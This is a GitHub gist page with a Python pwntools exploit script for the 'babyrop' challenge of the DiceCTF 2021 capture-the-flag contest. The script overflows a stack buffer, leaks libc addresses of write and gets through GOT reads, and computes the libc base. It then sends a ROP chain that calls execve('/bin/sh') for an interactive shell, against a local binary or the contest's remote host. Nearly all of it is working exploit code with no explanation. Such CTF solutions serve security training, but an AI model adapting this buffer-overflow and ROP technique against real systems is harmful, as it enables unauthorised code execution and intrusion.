Skip to content

Instantly share code, notes, and snippets.

@hugsy
Created February 8, 2021 18:21
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
Star You must be signed in to star a gist
Save hugsy/d8d2a775d8ca4604596aa90ecaccd48e to your computer and use it in GitHub Desktop.
dicegang 2021
#!/usr/bin/env python3.8
import os, sys
from pwn import *
context.update(arch="amd64", endian="little", os="linux",
terminal=["tmux", "split-window", "-v", "-p 75"],)
LOCAL = True
TARGET_ELF = os.path.realpath("./babyrop")
elf = ELF(TARGET_ELF)
def attach(r):
if LOCAL:
bkps = [
0x4011b0
]
cmds = [
"continue",
]
gdb.attach(r, '\n'.join(["break *{:#x}".format(x) for x in bkps] + cmds))
return
def read(addr, length):
pop_rbx_rbp_r12_r13_r14_r15 = 0x4011ca
call_r15_rbx = 0x4011b0
return flat(
p64(pop_rbx_rbp_r12_r13_r14_r15),
p64(0),
p64(1),
p64(1),
p64(addr),
p64(length),
p64(0x0404018),
p64(call_r15_rbx),
b"JUNKJUNK"*7,
)
def exploit(r):
attach(r)
write_got = 0x404018
gets_got = 0x404020
p = flat(
b"A"*72,
read(write_got, 8),
p64(0x401136),
)
r.sendlineafter(b"Your name: ", p)
write = u64(r.recv(8))
success("write: " + hex(write))
p = flat(
b"A"*72,
read(gets_got, 8),
p64(0x401136),
)
r.sendlineafter(b"Your name: ", p)
gets = u64(r.recv(8))
success("gets: " + hex(gets))
libc_base = gets - 0x086af0
success("libc:" + hex(libc_base))
system = libc_base + 0x55419 #0x055410
binsh = libc_base + 0x1b75aa
success("system:" + hex(system))
# shellcode from ropper --chain="execve cmd=/bin/sh""
rebase_0 = lambda x : p64(x + libc_base)
rop = b''
rop += rebase_0(0x000000000002911d) # 0x000000000002911d: pop r13; ret;
rop += b'//bin/sh'
rop += rebase_0(0x00000000000331ff) # 0x00000000000331ff: pop rbx; ret;
rop += rebase_0(0x00000000001eb1a0)
rop += rebase_0(0x0000000000064075) # 0x0000000000064075: mov qword ptr [rbx], r13; pop rbx; pop rbp; pop r12; pop r13; ret;
rop += p64(0xdeadbeefdeadbeef)
rop += p64(0xdeadbeefdeadbeef)
rop += p64(0xdeadbeefdeadbeef)
rop += p64(0xdeadbeefdeadbeef)
rop += rebase_0(0x000000000002911d) # 0x000000000002911d: pop r13; ret;
rop += p64(0x0000000000000000)
rop += rebase_0(0x00000000000331ff) # 0x00000000000331ff: pop rbx; ret;
rop += rebase_0(0x00000000001eb1a8)
rop += rebase_0(0x0000000000064075) # 0x0000000000064075: mov qword ptr [rbx], r13; pop rbx; pop rbp; pop r12; pop r13; ret;
rop += p64(0xdeadbeefdeadbeef)
rop += p64(0xdeadbeefdeadbeef)
rop += p64(0xdeadbeefdeadbeef)
rop += p64(0xdeadbeefdeadbeef)
rop += rebase_0(0x0000000000026b72) # 0x0000000000026b72: pop rdi; ret;
rop += rebase_0(0x00000000001eb1a0)
rop += rebase_0(0x0000000000027529) # 0x0000000000027529: pop rsi; ret;
rop += rebase_0(0x00000000001eb1a8)
rop += rebase_0(0x000000000011c371) # 0x000000000011c371: pop rdx; pop r12; ret;
rop += rebase_0(0x00000000001eb1a8)
rop += p64(0xdeadbeefdeadbeef)
rop += rebase_0(0x000000000004a550) # 0x000000000004a550: pop rax; ret;
rop += p64(0x000000000000003b)
rop += rebase_0(0x0000000000066229) # 0x0000000000066229: syscall; ret;
p = flat(
b"A"*72,
rop,
)
r.sendlineafter(b"Your name: ", p)
r.interactive()
return
if __name__ == "__main__":
if len(sys.argv)>=2:
LOCAL = False
r = remote("dicec.tf", 31924)
else:
LOCAL = True
r = process([TARGET_ELF, ]) #, env={"LD_PRELOAD": libc.path})
exploit(r)
sys.exit(0)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment